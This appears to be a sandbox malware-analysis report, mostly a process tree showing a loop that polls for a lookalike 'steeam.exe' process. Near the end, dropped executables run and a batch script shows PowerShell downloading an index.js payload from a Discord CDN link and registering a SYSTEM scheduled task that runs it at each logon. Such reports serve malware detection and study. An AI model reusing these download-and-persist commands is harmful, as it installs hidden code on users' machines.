C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
- Delays execution with timeout.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Windows\system32\timeout.exetimeout /t 16⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"6⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId7⤵
-
C:\Windows\system32\findstr.exefindstr /r /v "^$"7⤵
-
C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf1.exe"C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf1.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf2.exe"C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf2.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf3.exe"C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf3.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\582D.tmp\582E.tmp\582F.bat C:\Users\Admin\AppData\Roaming\nfy5hudn.bqf3.exe"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249224125830922300/1249224157745516664/index.js?ex=666dc668&is=666c74e8&hm=5dfd52c5327ffb2554e248dcb902443533012613ad4f330995dc83169665440c&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /72⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 7783C24C54E26C5743D3E0D7BEE9EAE32⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding D3E396B8E6366E49698C1B1C80681B08 E Global\MSI00002⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D1A00BE62A2CD2D3897EB23A6471553D2⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
